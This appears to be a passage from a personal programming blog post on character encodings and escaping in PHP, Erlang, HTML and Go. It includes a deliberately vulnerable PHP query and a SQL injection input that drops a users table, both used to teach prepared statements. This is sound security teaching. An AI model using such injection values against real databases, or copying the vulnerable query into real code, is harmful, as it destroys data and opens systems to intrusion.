0000010: 221b 2842 223b 0a0a 6563 686f 2073 7472  ".(B";..echo str
0000020: 6c65 6e28 246b 6f69 2920 2e20 223c 6272  len($koi) . "<br
0000030: 3e5c 6e22 3b0a 6563 686f 2024 6b6f 693b  >\n";.echo $koi;
0000040: 0a0a 3f3e 0a                             ..?>.

あ encodes as 1b 24 42 24 22 1b 28 42. Those playing at home will notice a 22—i.e. "—is stuck in the middle, so PHP thinks you’ve prematurely terminated the string.

The solution is to encode your source files as UTF-8, because UTF-8 guarantees that all ASCII characters—that is, values 00 through 7f—are both mapped to the same byte in UTF-8, and that those bytes will not occur in a UTF-8 stream as part of any other character. UTF-8 is marvelously well-designed (actually).

This means that PHP won’t do anything funny with your strings, though it still treats it like a bag of bytes. Next, use only the multibyte string extension to do string operations. For instance, let’s revert back to the 恋は戦争 example in UTF-8, and use mb_strlen() instead of the plain variety:

<?

$koi = "恋は戦争";

echo mb_strlen($koi) . "<br>\n";
echo $koi;

?>

And we see:

Whoops. That’s raw bytes again! The multibyte module has no idea what encoding to use, so if we don’t tell it, it behaves as usefully as strlen(). We have to tell it, and in a very PHP-like manner, we set a global state for the interpreter. Great.

<?

mb_internal_encoding("UTF-8");

$koi = "恋は戦争";

echo mb_strlen($koi) . "<br>\n";
echo $koi;

?>

And finally:

Onto saner pastures.

Erlang

Erlang is a funny language. It doesn’t even have strings⁴. Instead, a string is a list of numbers; the REPL guesses that a list should be pretty-printed as a string if they all look like printable ASCII:

1> "Hello.".
"Hello."
2> [72, 101, 108, 108, 111, 46].
"Hello."
3>

lol! Gnarly! But seriously, this accidentally becomes great when you start Unicoding it up like you’re part of the UN:

3> S = "恋は戦争".
[24651,12399,25126,20105]
4>

Huh!? Well, they’re not printable ASCII, so what are they? Let’s translate those pesky decimals into something humans can read:

4> [io:format("~4.16.0b, ", [N]) || N <- S], ok.
604b, 306f, 6226, 4e89, ok
5>

604b? Doesn’t that sound familiar?. It’s actually interpreting each Unicode character (not each byte) as its integer codepoint. That means all lovely things we want to assume hold true, like length calculation and substrings:

5> length(S).
4
6> io:format("~ts~n", [lists:sublist(S, 3, 2)]).
戦争
ok
7>

So Erlang provides a pretty good native data-type for storing Unicode characters; pre-Unicode, we were just storing the numbers of ASCII characters in a list, so now we just store the numbers of Unicode codepoints instead.

Unfortunately, the simplicity of entry does not extend to source files. D’oh! The Erlang manual specifies that source must be entered in ISO-8859-1, also known as “Latin-1” encoding. Only the REPL is smart enough to do Unicode. This is detailed in the Erlang manual.

So you could consider that it’s difficult to get Unicode data into Erlang—in that you can’t enter it directly into the source—but once you have it, it’s much more straightforward to manange than with, say, PHP. The reality is, most Unicode data in your program will be coming from without your program, not within—i.e. user input, API call results, etc.—so this isn’t as bad as it sounds.

Erlang doesn’t store metadata about the encoding; it avoids the problem entirely by letting strings represent Unicode natively. Once you start sending or receiving them on the wire, you’ll usually want convert them to or from binary strings with functions from the unicode module, which provides helpers for various UTF encodings, and Latin-1. Once so-converted, the data is unambiguously opaque … compared with PHP’s “I don’t have a clue what it is”.

HTML

This is a huge kludge.

HTML itself contains a way to declare its own encoding, using a <meta> tag to declare the Content-Type of the document. The issue, if you weren’t paying attention, is that reading the <meta> tag implies you are able to make any sense of the document whatsoever. Valid HTML requires the <meta> to appear within the <head>, i.e. for HTML 5:

<!doctype html>
<html>
<head>
  <meta charset="utf-8">
  ...

This isn’t a problem with sane encodings, because they tend to map ASCII through; but things like UTF-16 and above require the server to declare the content-type in the HTTP headers; interpreting UTF-32 as ASCII leads to madness.

For comparison’s sake, the layout on disk of the above in UTF-8 (identical to ASCII here):

00000000: 3c21 646f 6374 7970 6520 6874 6d6c 3e0a  <!doctype html>.
00000010: 3c68 746d 6c3e 0a3c 6865 6164 3e0a 2020  <html>.<head>.  
00000020: 3c6d 6574 6120 6368 6172 7365 743d 2275  <meta charset="u
00000030: 7466 2d38 223e 0a                        tf-8">.  ....

And in UTF-32:

00000000: 0000 003c 0000 0021 0000 0064 0000 006f  ...<...!...d...o
00000010: 0000 0063 0000 0074 0000 0079 0000 0070  ...c...t...y...p
00000020: 0000 0065 0000 0020 0000 0068 0000 0074  ...e... ...h...t
00000030: 0000 006d 0000 006c 0000 003e 0000 000a  ...m...l...>....
00000040: 0000 003c 0000 0068 0000 0074 0000 006d  ...<...h...t...m
00000050: 0000 006c 0000 003e 0000 000a 0000 003c  ...l...>.......<
00000060: 0000 0068 0000 0065 0000 0061 0000 0064  ...h...e...a...d
00000070: 0000 003e 0000 000a 0000 0020 0000 0020  ...>....... ... 
00000080: 0000 003c 0000 006d 0000 0065 0000 0074  ...<...m...e...t
...

(it goes on like this)

Triples of NUL-bytes separating everything! This is UTF-32’s grand plan to support everything without variable-width encoding, meaning operations like string length, slicing and substring matching could be done fairly cheaply⁵.

In these cases you should be ensuring the server sends the correct Content-Type, implying the server has a clue—and if you’re lucky, enough users’ browsers will guess.

This could be considered a non-solution.

The other thing HTML brings to the table, via SGML, is character entity references, giving you the ability to refer to any Unicode character by codepoint. This doesn’t make for happy editing, but it does mean that HTML can represent arbitrary Unicode characters even when the HTML itself is ASCII, for instance.

Representing Unicode characters

This is an important concept. In HTML, one can enter:

&#x604b;&#x306f;&#x6226;&#x4e89;

And get this in their browser:

This is without any other markup or declaration of encoding; we’re telling the browser to render the characters by Unicode codepoint directly. This is equivalent to entering them into a list in Erlang source directly:

[16#604b, 16#306f, 16#6226, 16#4e89]

It’s important to make clear a distinction here, however: HTML is markup, and Erlang is a programming language. HTML gives you an escape route to render a given codepoint, which is good, but what we’re talking about when we talk about Erlang is actually an internal representation.

This is what I’m more interested in, so I’ll put HTML to the side for now.

When data enters your Erlang program, it’s most likely going to be encoded in some form; whichever service receives that data is responsible for making sense of it. Imagine you’re writing a webserver: people might submit forms in UTF-8, UTF-16, Shift JIS, Latin-1, whatever. No matter what you’re doing with that data—you might be spitting it right back in the response; hacking it up into pieces; storing in a database, maybe for later hacking—you need to normalise the format of the data while you still know what format it’s in.

If you’re coding in PHP and you receive a string full of bits, if you throw that into a database without noting the encoding ⁶, you’ve permanently lost the ability to say for sure what the data actually is.

The solution, then, is to normalise the data at the point of entry, once, and to normalise it into an internal format that makes sense. In Erlang, you might store a string as a codepoint list. In PHP, you’ve little option but to normalise it to another encoding like UTF-8, and to decide that UTF-8 is the internal format for textual data.

Check your blindspots

Do not fall into the trap of saying “well, I know my users will only enter Latin-1 data, which happens to be the default, so I’ll just save that and print that.” Guess what? That’s what most of Japan said when they decided to use Shift JIS. Except for those who used ISO-2022-JP. Or EUC-JP. Good luck to most of these people when people from other countries start submitting data.

If you won’t listen to me, listen to the experience of the top 25 Japanese websites according to Alexa. A forum post from mid-2007 detailed 10 of them using UTF-8. When I check the other 15, 8 have moved to UTF-8, leaving 7 not using UTF-8. 3 of those are on Shift JIS because they’re either tailored for the Japanese mobile market—which endemically tends to only support Shift JIS (Japanese mobile phones are not like your mobile phones) —or because they make heavy use of Shift_JIS art.

Storing data authentically is something that, as programmers, we need to get used to, and clobbering data that doesn’t conform to your expectation makes no sense.

When data comes in, store it in a normal form. If you’re building a webservice in a sane language or framework, it’s probable that the environment has done this work for you.

Don’t escape data

The key is to strongly mark the boundaries of keeping data in one format and another. Strongly-typed languages can distinguish this at compile time and stop mistakes, but that’s a rant for another day.

I’m going to start talking about another encoding process, often referred to as escaping.

Pop-quiz: what’s wrong with this PHP?

<?

// Omitted: init.

$username = $_POST["username"];
$password = $_POST["password"];
mysql_query("INSERT INTO tblUsers VALUES ('$username', '$password')");

?>

A related question is “what’s not wrong with this PHP?”. I can think of nine separate issues with it ⁷, but let’s look at the obvious one: $username and $password are inserted into the query unescaped. Maybe.

Unless you live under a rock, you’ll recognise the SQL injection attack, also known as SQLi. The issue is because we’re substituting $username—which we should think of as user data—directly into the stream of a MySQL command. By doing so, we’re essentially saying that the user data is part of a MySQL command—because it is. A user could enter "'); DROP TABLE tblUsers; --, and because we failed to encode user data as user data (which really means escaping here), it happens.

So how do we “encode” data? The correct way is to let the layer of abstraction handle that for you. If you use PDO, and put the laundry list of issues with the above code aside, it looks like this:

<?

// Omitted: init, database connection in $db.

$stmt = $db->prepare('INSERT INTO tblUsers VALUES (:username, :password)');

$stmt->execute(array(
	':username' => $_POST["username"],
	':password' => $_POST["password"],
));

?>

We let PDO deal with constructing the query—being the most-informed part of the system to deal with query parameter encoding. If we do it ourselves, we’ll probably make a mistake.

Note that we are not escaping the data—we’re deciding that another part of the system which knows how to do it should do it instead. Knowing when not to escape is often just as important as knowing when to escape.

Caveat

Q. When will the above go terribly wrong?

A. When a deficient language tries to automate security, and finds that’s actually not possible according to the definition of security.

Hello, your database is now full of backslashes. Unfortunately, magic quotes is enabled at the level of the webserver, so if your host has it enabled, you have to try to turn it off. Look at that Example #2. Mmmmmm.

Do not rely on broken auto-escaping. Your code will become unportable (and insecure) if you end up hosting the same stuff elsewhere where this process does not take place. It’s tantamount to assuming all data will come in encoded in UTF-16 and being surprised when your application breaks at inopportune moments.

(Edit 2021-02-18: I’ve needed to put in archive links here, as this has been thoroughly sweeped under the rug; deprecated in PHP 5.3 and removed in PHP 5.4. Keep in mind you can still find PHP 4 webhosting if you search for it.)

The golden rule

So, what’s the guiding principle?

Data in your application should be semantically pure.

If this doesn’t make any sense to you, read it once more, and I’ll explain.

Data in your application should be semantically pure.

Let’s say you take a username as input in a web application. When the client makes the request and sends us this username, we receive it into a variable. What does the variable contain, right from the start? Is it the exact text they entered? Does it have quotes escaped? Are characters like < and > converted to HTML entities so we can output it back into the page if we need to?

No. The variable contains the username. Nothing else.

It is not escaped. It has no special encoding other than the normalisation about textual data encoding we’ve already discussed. It is in no way prepped for output, because it is the pure username.

When we want to output it, we pass it to the presentation layer pure, and let the presentation layer apply as many post-processing layers of encoding as is required for the context. It will probably convert special characters to entities if they could cause issues. If it’s being put in a link URI it will be URI encoded. If it’s ending up in some server-side generated JavaScript it may need to be escaped appropriately.

When we want to do a match against the database, we pass it to the database layer pure, and let the database layer perform the correct escaping for the context.

Let’s say you take a user’s age as input in a web application. You may have a mind for UX, so you check that the field appears to contain a number. Now, before you start passing that variable around everywhere, what do you do? You represent it internally as a number. You call intval or list_to_integer/1 and you let the presentation layer decide what to do with a number.

Otherwise you’re going to leave yourself open for all sorts of trouble.

The key is that the value is semantically pure—it carries the meaning of the value in the programming language as it does in your mind. No extra backslashes in your mind? Make sure the application sees that too. This is why we add structs, classes, new types and so forth; to better model the semantics of the values in the programming language.

MVC

The model is the purest part of the application. You ask it for some value, and it gives it to you, completely unadorned. It’s the controller’s responsibility to request data of the model, and to hand all requisite data so gathered to the view; it’s ultimately the view’s responsibility to perform encoding of data according to context.

Similarly, when the controller receives request data, it should parse it into semantically meaningful values, which are then passed back to the view and into models as appropriate.

If the view then, say, uses some of this data in a query string value, it URI encodes it. If it’s including the data on the page directly, it converts HTML entities to avoid XSS.

And so on.

Escape data, unescape data

I hope this entry might have shown you some of the parallels between character-set encoding and escaping; they are both forms of processing data into different formats, and it’s nearly always a mistake to not know if this form of processing has occurred yet on a given piece of data, anywhere in an application.

Repeating the process (double-escaping or double-encoding) without intending to means you’re actually talking about those bytes that represent the encoded data in the encoded data. Without being sure of the state of your inputs, this can happen easily, and the next time you type 恋は戦争, you end up seeing æ<81><8b>ã<81>¯æ<88>¦äº<89>—which is what happens if you interpret the UTF-8 bytes of the string as a Latin-1 sequence⁸.

Here are some other actions analogous to encoding.

Shell escaping.
Wrapping in the jQuery object⁹.
Quoting people in conversation.
Editor’s comments in a quote in a newspaper.

Ultimately, it’s a matter of being certain about the type of data you’re handling, whereby type I mean anything relevant to parsing its semantic content. Both dynamically- and statically-typed languages are amenable to annotating objects with metadata concerning the operations that have been carried out with them.

I’m also trying to point out that this is not restricted to programming languages—it’s whenever you have different categories of things being spoken of, or different levels of abstraction.

Golang’s html/template package, effectively performing the role of the view in MVC, does automatic encoding of data that has come from the controller, depending on the context. This is a nifty feature, as it allows you to forget about escaping—so long as you are passing it semantically pure data, of course.

If you have the template <p>{{ "{{." }}}}</p>, then data to be substituted at dot will have HTML entities inserted automatically, preventing XSS attacks. Similarly, with the template fragment <a href="/?action={{ "{{." }}}}">{{ "{{." }}}}</a> dot’s content will be URI encoded in the first instance and have HTML entities inserted in the second.

As the package documentation explains:

This package assumes that template authors are trusted, that Execute’s data parameter is not, and seeks to preserve the properties below in the face of untrusted data:

Structure Preservation Property: “… when a template author writes an HTML tag in a safe templating language, the browser will interpret the corresponding portion of the output as a tag regardless of the values of untrusted data, and similarly for other structures such as attribute boundaries and JS and CSS string boundaries.”

Code Effect Property: “… only code specified by the template author should run as a result of injecting the template output into a page and all code specified by the template author should run as a result of the same.”

Least Surprise Property: “A developer (or code reviewer) familiar with HTML, CSS, and JavaScript, who knows that contextual autoescaping happens should be able to look at a {{ “{{.” }}}} and correctly infer what sanitization happens.”

This provides a lot of reassurances that we want—but then if we do have some data in the controller that we really want to be substituted in as HTML, what’s a cute programmer such as yourself to do?

The same package provides the HTML type —actually, a synonym for string. In Golang, type synonyms are different types with respect to method sets—we can’t use a method of one on another (methods are not inherited)—and there is no implicit conversion between them. Objects of different types (even where the types are synonyms) are completely different, except that we can convert between them as they have the same underlying type. This means that we can take a string and turn it into a HTML with a simple conversion:

// x is of type string
x := "<p>This is delicious!</p>"

// y is of type HTML
y := HTML(x)

Passing an object of type HTML to html/template tells it that the escaping required to sanitise HTML has already been done, and so in a context where such escaping is necessary, the content will be included verbatim. Of course, this also implies you don’t let user input find its way into a HTML-typed object without doing necessary encoding/normalisation yourself. I refrain from using the word “sanitisation”, as the term has plenty of bad connotations which I’m about to talk about.

There are a range of other types for indicating that you’ve taken on the responsibility of validating the variable contents are safe for use in given contexts, i.e. giving the developer an escape for getting some data in which you know you don’t want re-encoded. The important thing is that you’re categorically stating that it’s so—no part of the system will assume it otherwise. It’s safe by default, but in a way that doesn’t compare to “magic quotes”, because it’s happening at the view, right before output, not at data entry, contaminating your entire application.

For the love of all that is good

Don’t do this.

This is an anti-pattern. This is the anti-pattern. The author’s very first suggestion is to tell you to set the server-wide configuration for PHP to automatically do certain escaping on some variables. The idea is that you can now pretend that all your variables are ready to become a part of HTML somewhere!

Of course, if you insert these (safely) into the database, you’ve just inserted HTML-sanitised data into the database. Your database is perfectly capable of storing the text kivi "owl" kakk, but now you’ve got a row with the value kivi "owl" kakk. If you still think this is a good idea, you should leave the classroom right now.

You read this out of the database. Maybe you want to know how many characters long it is. strlen()? 26. Never mind that the actual displayed string is 16 when shown in HTML. Maybe you want to use this value in an API call to some other webservice. You wrap it in a few objects, maybe encode it to JSON. Now you have to remember to decode the entities before you use it in non-HTML contexts. Though if you want to put it into HTML to be part of a URI, you have to remember to decode it, then re-encode it with URI (component) encoding. You lose.

If you treat data semantically to begin with, and only encode it as appropriate for the output at the time of output, we don’t have an issue. Input filtering is just a way to make sure you’ll never really know what’s in a variable.

Conclusion

Data in your application should mean what it means.

When data comes in, interpret its meaning once, according to context.

When data goes out, encode it meaningfully according to context.

This applies to charsets, escaping and more.

Postscript: PHP strings

It’s interesting to note here that there is neither a PHP type which represents a string with a given encoding— the PHP string is a byte-buffer and no more—nor a suitable sequence-like container for arbitrary codepoints; you could follow the same approach that Erlang takes and store codepoints as integers within arrays, but due to PHP’s impressive array type¹⁰, it would be incredibly inefficient.

I’m also not finding any way to take an arbitrary list of codepoints (or a single codepoint) and return it in a given encoding; the data is always assumed to have come in as a string in some encoding. Of course, you could take your codepoints and convert them to UTF-8 yourself, and then treat that with the multibyte string module. This appears to not be atypical. Oh, PHP.

Hint: the way PHP does it is silly. See the part on “Text” in Eevee’s blog post about PHP. ↩
Japanese koi wa sensou, meaning “love is war”. ↩
All encodings mentioned so far, except ASCII, are examples of variable-width encodings, or multibyte encodings. ↩
Well, there are binaries, but sshhhh, I’m in the middle of pointmaking. ↩
Of course, they shot themselves in all thirty-two of their feet when English-language text in UTF-32 resembles UTF-16 so much that browsers trying to auto-detect encoding when the server doesn’t declare it detect it as UTF-16, not to mention endianness problems also found in UTF-16 and the terrible kludges to work around them.

Given UTF-16 doesn’t solve any problem (well), and creates many, I find myself wondering why they bothered. ↩
And how do you know the encoding? You don’t. The browser encodes it in the same encoding as it determined the page to be. Think about what that means for a bit. ↩
1. may need to check get_magic_quotes_gpc() to know if data is encoded.
2. password stored unhashed.
3. we don’t specify a connection object.
4. we’re using an antique MySQL library.
5. inputs are unescaped (maybe—see point 1).
6. escape inputs when you could use placeholders? Doing so successfully means ensuring data is not escaped by now; see point 1.
7. specifying columns; inserted columns may cause failure, or just data going in the wrong places.
8. use placeholders when you can use an ORM?
9. checking return value; because who cares about data integrity?
This list itself is an example of poorly encoded data. Note how it’s inconsistent as to whether the items mentioned are the issues, or the fixes. ↩
Of course, note that these characters are of course embedded in this document with UTF-8. ↩
jQuery is special in that it’s never a mistake to rewrap in jQuery; the jQuery wrapper function is idempotent. This is because you can unambiguously distinguish between an wrapped object and a not-wrapped object; note that the same does not hold of arbitrary strings without metadata attached to the string describing what encoding it should be. Ruby’s strings, for instance, have no issues, as they carry knowledge of their encoding.

A common practice is to prefix a variable name with a $ if it’s known to be wrapped in jQuery—because you’ve guaranteed it at the point of naming the variable, typically. This is a way of making the assertion about the encoding obvious. Because you can’t accidentally overwrap an object in JavaScript, usually an absence of $ prefix implies no guarantee—it may be wrapped or unwrapped, and the only way to guarantee e.g. a DOM object, is by wrapping and then using get. The point is that you can never mistakenly assume something to be jQuery wrapped when it isn’t; you’ll always know. ↩
Hint: there is none. I know where you can get a hash-table-y kinda thing, though. ↩

kivikakk.ee

Dx

WAHOO

escraping

Fluent jj / aggressive aliasing

disturbing lack of awareness

u could work with me if u wan

safety.. first?

figs 2

bruh

ingress-nginx is dead, long live the Gateway API

But!

on llms (Ⅳ)

Theft and DDoS at scale are cool and we all love it

For programmers particularly, there’s a continuum of fun new stuff from identity loss to an overwhelm of slop patches and everything in between.

They Can’t Work.

Economic impact. The share markets are a fuck, the flow-on effects (RAM prices!) widely felt, and every product is now ✨ intelligent ✨ in ways no-one ever asked for.

Environmental impact. Our world is burning, and you know what it doesn’t need more of right now? Datacentres.

some things to make guix (system) less painful

Use Guix Moe’s substitutes

Change your guix channel source to Codeberg

Hey, saayix has some nice software

(a → a) → a

please pass this information on

January 2026 Five Questions

grab bag

garbage

hades Ⅱ statue%!!

Something has gone wrong

on llms (Ⅲ)

cluster overview

cert-manager

chog

default

enbi

external-dns

flux-system

furpoll

ingress-nginx

kube-node-lease

kube-public

kube-system

kv

linkding

miniflux

minio-kala and minio-operator

nossa

outline

postgres-cassax

shynet

static

things i did last year

things that were a pity in the year of our lord 2025

Apps I Use

boost: In Praise of dhh by Filipa Mendonça-Vieira

pipa! pipa!

just use rustup

reminder to nix-collect-garbage

One month at GitLab

ERB::Util.html_escape_once: not even once.

Text

From text to HTML

Aside: is this the punchline? (It is not.)

Text in HTML

HTML in HTML

Trust levels

Diagrammatic tl;dr

Postscript: on automated HTML safety

Postscript: on tags that aren’t tags

tired

"i like making things—" no. you like things.

important

Let's give Comrak a home with mama

Post-install message from httparty

kodus

no politics!! unless, of course, we are discussing tolerating nazis or ragging on CoCs :)

resources for improving as a software engineer

how to leave lobste.rs for good in 3 easy steps

nóssa: now with a prettier homepage!

SLITHER

Change your `guix` channel source to Codeberg

`cert-manager`

`chog`

`default`

`enbi`

`external-dns`

`flux-system`

`furpoll`

`ingress-nginx`

`kube-node-lease`

`kube-public`

`kube-system`

`kv`

`linkding`

`miniflux`

`minio-kala` and `minio-operator`

`nossa`

`outline`

`postgres-cassax`

`shynet`

`static`